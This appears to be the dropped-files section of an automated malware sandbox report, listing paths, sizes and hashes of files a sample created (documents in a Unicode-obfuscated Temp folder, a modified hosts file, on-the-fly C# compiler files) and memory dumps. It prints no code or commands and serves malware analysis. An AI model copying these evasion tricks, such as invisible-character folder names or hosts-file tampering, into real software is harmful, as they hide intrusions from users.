1e98f769c74e7b705c59884e52be791b45259fdd4c14dd4accdda8ce935bcae1d0d3cf434a1a4e1be871ee21fd9457bd49cf8a72921ef38d7fb8e136e039f99a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‏ \Common Files\Desktop\SuspendInstall.mp3

Filesize
670KB

MD5
937cb9e868c9a7b1904bc10dd365f12f

SHA1
aca78dcb7a7969587b23d4971935a9c66acbfe1d

SHA256
7d4c4a4be6541741e488ea731c512a45b437dc9e391ade7d0b10ad783af4173a

SHA512
207fa5658e73dc066f694145b2151e24a90a4f8ef8768c25981ac956aaff127f5c50c96d2e1c9a8a48b157395a5ca30366ed535689bdb50140058ad9565186e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‏ \Common Files\Desktop\UndoComplete.xlsx

Filesize
9KB

MD5
c37837ed3a8763eae6dd4307005dd6c1

SHA1
08c7b515815f85f7406e8b1af51d03d54fcda75a

SHA256
e8ebf2579ba613132874c47538839ef84a3e373d9e4b79f7494996f34f361637

SHA512
759fe532976b363e45913596e1c8f8cf0192382d56fd9d48085ec8119f59d209ccaa171bb4012e6506d38a7db1c15105dadd8cdb665113a299d79da38390fc9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‏ \Common Files\Documents\GrantOptimize.doc

Filesize
1.1MB

MD5
fc68341f9076de9ddbb1665048df26c2

SHA1
d998eae128e118fe1ab52168cb05feabbcb7549f

SHA256
681889757e2d7fdb3b7ddcda7ab358bf3131e9ae4e7072e305abac4fa60d6aa0

SHA512
5015add70c76f70e80f66894f9bba948c396fcb19c7fef3813f62fc7222f4c650d714faf299c43b11950b5fdad6ee37e3c336188566d31a5acf40bde20907552

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‏ \Common Files\Documents\PushInitialize.pdf

Filesize
430KB

MD5
6dd30f706e370fe9ce7abdb0bc159179

SHA1
94f037f13acc49c36d610df152cff6564303ad07

SHA256
e1d23884f0cc952b1cbd3029f319c87ab371b779080a84c730522e551cbf7415

SHA512
b7189531098d21d1775167861a23b9efef4c2d06f4b65b2d3b8514883d601d1790ff73f38b2ee35f98c9e92cea232e004753f7cccd3b85ca6306fee9c0e0a7cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‏ \Common Files\Documents\SetLimit.docx

Filesize
17KB

MD5
dd55b42584fe85e860c42bf49062628f

SHA1
ccbfcc7bd0bb14b02e29ac98947d9375b811f6fb

SHA256
ab43fc5826b74c465d713489158d2349cca9433754726ce54c8b23fb9d8927c9

SHA512
c3f581f94ce25331cd8a7b2b90187177e87bdb59fd8d86e5ce5c6450a5fe4798ce708a4338d2621feba04eaeac019b1dcd4dcda25fdd6ab26e4ba2ba316ee0d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‎ ‏ \Common Files\Documents\SkipBackup.xlsx

Filesize
12KB

MD5
c32c29591bb2d360d24dc88154657f33

SHA1
a1aafa70a423dd2f9cb403a6b87c927d982a465f

SHA256
95860befec2e42c79aa9bc29a375fb3745d83ac72cd55e98b77432bfe3fc434f

SHA512
9c90498c54ec99d629109b00a7f02a866d3b169b37ddfc61aabb04474f346a5c0d0d4a1f622c6ec329624a7c47c75a4e4bc55a4557aaa8fff408a3292aa79b7f

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cldckvrn\CSC21C7ABBDF95640049E7B673AD9D48A6.TMP

Filesize
652B

MD5
0619125e9a42bb6b4f633676005c88b4

SHA1
444c3d6b54e4408c2a240ec29e1b0b5a0b82c19f

SHA256
faf4fd0a33906c4b41428f9afd495559e1e29b409bd0b28a1684ba49390db246

SHA512
c966d8e92de1396320ad7f68d5b54dc322145063f7f4b1224220209a4a570b2c46e9d7e4213fe04b2baf1a8d897c9389aae3404ae155b6927ca8a55b2390b079

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cldckvrn\cldckvrn.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cldckvrn\cldckvrn.cmdline

Filesize
607B

MD5
61cdb5ea6270542764b14008481bd3c3

SHA1
fbbc0f34ae1d2f56d65644e2314275e4ffb3ea35

SHA256
eb97de0a27a5644d1ec6e252ce3e64419f208c2416f5dcc65866bdbe0270c2b7

SHA512
fc0a2586f095f2093cc345952838be0e06275aa9ecf6facc79620bdc0333ead43b184bfa759464ed8b66265159f83e5c8db983e5eb8c343113fd0476e6eaf162

Download Submit
memory/1364-186-0x000002B218000000-0x000002B218008000-memory.dmp

Filesize
32KB

Download
memory/2188-256-0x0000019159910000-0x0000019159A5E000-memory.dmp

Filesize
1.3MB

Download
memory/2688-63-0x000001C839FB0000-0x000001C839FD2000-memory.dmp

Filesize
136KB

Download
memory/3756-244-0x00000253BF750000-0x00000253BF89E000-memory.dmp

Filesize
1.3MB

Download